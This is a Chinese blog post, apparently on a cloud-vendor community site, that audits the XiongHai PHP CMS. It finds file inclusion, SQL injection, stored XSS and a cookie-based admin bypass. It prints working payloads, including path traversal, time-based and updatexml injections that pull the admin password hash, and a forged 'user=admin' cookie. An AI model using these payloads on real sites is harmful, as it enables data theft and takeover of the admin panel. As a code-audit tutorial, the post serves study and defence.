记录一次代审实战,熊海CMS代审日记

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介: 1.拿到源码并进行白盒测试白盒测试又称结构测试、透明盒测试、逻辑驱动测试或基于代码的测试。 白盒测试是一种测试用例设计方法,盒子指的是被测试的软件,白盒指的是盒子是可视的,即清楚盒子内部的东西以及里面是如何运作的。 "白盒"法全面了解程序内部逻辑结构、对所有逻辑路径进行测试。 "白盒"法是穷举路径测试。


1.拿到源码并进行白盒测试


白盒测试又称结构测试、透明盒测试、逻辑驱动测试或基于代码的测试。 白盒测试是一种测试用例设计方法,盒子指的是被测试的软件,白盒指的是盒子是可视的,即清楚盒子内部的东西以及里面是如何运作的。 "白盒"法全面了解程序内部逻辑结构、对所有逻辑路径进行测试。 "白盒"法是穷举路径测试。


77a6cd8eb4694ff191a30f175fedc637.png


分析一下项目结构:


admin      --管理后台文件夹
css        --存放css的文件夹
files      --存放页面的文件夹
images     --存放图片的文件夹
inc        --存放网站配置文件的文件夹
install    --网站进行安装的文件夹
seacmseditor  --编辑器文件夹
template      --模板文件夹
upload        --上传功能文件夹
index.php     --网站首页


2.自动审计


先使用seay自动审计一下,减小工作量


f7c7bb9065b2493e94b7a5dade822b69.png


自动审计完成,发现34个可疑漏洞

seay支持导出代审报告:


67579fa27f5d4b2d9ef7d9291f92288d.png


3.文件包含


首先看一下index.php 和 admin/index.php 显示的文件包含漏洞

代码片:


<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>


代码中用函数addslashes进行了一波过滤,防止命令执行,但是对于文件包含无济于事,既然没有限制,那么我们就可以包含到files文件夹下的源码甚至根目录下的文件内容


PHP addslashes() 函数
在每个双引号(")前添加反斜杠:
<?php
$str = addslashes('Hello "PHP", please be kind to me');
echo $str;
?>
--------------------------
输出:
Hello \"PHP\", please be kind to me


比如我们在根目录下新建好一个phpinfo.php文件


<?php phpinfo(); ?>


构造payload进行访问


?r=../../phpinfo


http://localhost/xionghai/admin/index.php?r=../../phpinfo


成功访问到了phpinfo.php文件的内容


88e04b3820ff428eb481cb103d49e04f.png


注意此CMS是有两处文件包含,一个位于index.php,一个位于admin/index.php,都可以利用成功


4.SQL注入


SQL注入一般存在于网站中要向数据库中提交或更新信息的地方

比如此CMS后台的login.php源码:


<?php 
ob_start();
require '../inc/conn.php';
$login=$_POST['login'];
$user=$_POST['user'];
$password=$_POST['password'];
$checkbox=$_POST['checkbox'];
if ($login<>""){
$query = "SELECT * FROM manage WHERE user='$user'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$users = mysql_fetch_array($result);
if (!mysql_num_rows($result)) {  
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}else{
$passwords=$users['password'];
if(md5($password)<>$passwords){
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit; 
  }
//写入登录信息并记住30天
if ($checkbox==1){
setcookie('user',$user,time()+3600*24*30,'/');
}else{
setcookie('user',$user,0,'/');
}
echo "<script>this.location='?r=index'</script>";
exit;
}
exit;
ob_end_flush();
}
?>


不要着急,我们先简要分析一下源码:(增加了注释)


```php
<?php 
ob_start();
require '../inc/conn.php';
// 通过POST方式接受数据
$login=$_POST['login'];
$user=$_POST['user'];
$password=$_POST['password'];
$checkbox=$_POST['checkbox'];
if ($login<>""){
// 编写的sql语句存入变量$query
$query = "SELECT * FROM manage WHERE user='$user'";
// 没有任何过滤,直接使用mysql_query函数提交到数据库执行,这个正是我们可以利用的攻击点
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$users = mysql_fetch_array($result);
// 此处的意思是,如果在数据库中没有找到要登录的用户名,提示错误
if (!mysql_num_rows($result)) {  
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}else{
// 找到了用户名,但是密码错误,同样弹出一个错误信息
$passwords=$users['password'];
if(md5($password)<>$passwords){ // 这里的密码使用了md5函数进行了一次加密操作
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit; 
  }
//写入登录信息并记住30天
if ($checkbox==1){
setcookie('user',$user,time()+3600*24*30,'/');
}else{
setcookie('user',$user,0,'/');
}
echo "<script>this.location='?r=index'</script>";
exit;
}
exit;
ob_end_flush();
}
?>


测试使用万能密码无法登录,但是依然存在布尔盲注和报错注入

比如,我们构建恶意提交


// 布尔盲注
admin' or sleep(10) #
// 进行报错注入
1' or updatexml(1,concat((select concat(0x7e,password) from manage)),0) #
1' or updatexml(1,concat((select concat(password,0x7e) from manage)),0) #
// 将获得的MD5值进行爆破破解得到password的铭文,随后继续注入获取用户名
1' or updatexml(1,concat((select concat(0x7e,user) from manage)),0) #  //admin
// 获得所有信息,可以使用admin账号进行后台的登录操作


至于源码中其他的诸多SQL注入漏洞,本质上都是一样的思路


df98ceda66374f6bbef60c7fcaa058ea.png


5.存储型XSS漏洞


files/content.php

通过对代码片的分析前端没有对提交的数据进行限制:


<li><span>昵称</span><input name="name" type="text" value="<?php echo $_COOKIE['name']?>" /></li>
<li><span>邮箱</span><input name="mail" type="text" value="<?php echo $_COOKIE['mail']?>"/></li>
<li><span>网址</span><input name="url" type="text" value="<?php echo $_COOKIE['url']?>"/></li>


通过全局搜索提交变量,发现后端也没有进行限制


$save=$_POST['save'];
$name=$_POST['name'];
$url=$_POST['url'];


因此产生了比较严重的存储型XSS漏洞


ebb6cd84702548b086898f0327eaf878.png


6.越权


inc/checklogin.php


<?php
$user=$_COOKIE['user'];
if ($user==""){
header("Location: ?r=login");
exit; 
}
?>


代码大意就是 接收cookie中user的内容,如果user字段为空,则跳到登录页面

那么发现,此处的user应该就是登录的用户名,我们通过抓包修改user字段值为admin,可以成功进入admin账户进行后台管理操作

相关实践学习
如何快速连接云数据库RDS MySQL
本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
3月前
|
域名解析 SQL 前端开发
如何使用CMS来搭建一个网站?
在如今的时代,拥有一个网站成为每一家企业展现形象、拓展业务、传递信息的重要途径。网站在互联网上吸引潜在客户、合作伙伴。对于大多数希望自行建设网站的企业来说,内容管理系统(CMS)成为了理想选择。
129 8
|
Web App开发 搜索推荐 Java
|
3月前
|
域名解析 前端开发 搜索推荐
什么叫CMS?如何使用CMS来制作网站?
PageAdmin CMS,是一套开发了17年,官网还持续在更新和维护的网站内容管理系统,对于领开发的用户来说,对于有网站优化的用户来说,PageAdmin CMS就能帮助我们快速搭建属于自己的个性网站或企业网站。
215 5
|
5月前
|
消息中间件 算法 前端开发
京东面试:说说CMS工作原理?
京东面试:说说CMS工作原理?
54 2
|
7月前
|
JavaScript 前端开发 关系型数据库
技术心得记录:新闻cms管理系统(二)
技术心得记录:新闻cms管理系统(二)
26 0
|
8月前
小课堂 -- CMS识别
小课堂 -- CMS识别
31 0
|
小程序 数据可视化 数据库
云开发(微信-小程序)笔记(十七)---- cms(内容管理)及案例
云开发(微信-小程序)笔记(十七)---- cms(内容管理)及案例
549 0
|
存储 小程序 数据库
微信小程序云开发日记类日记记录分享动态
微信小程序云开发日记类日记记录分享动态
259 1
微信小程序云开发日记类日记记录分享动态
|
负载均衡 Go
easycar更新日记
easycar更新日记
112 0
easycar更新日记
《CMS后台系统》项目实战 详细分解(六)
《CMS后台系统》项目实战 详细分解(六)
98 0
《CMS后台系统》项目实战 详细分解(六)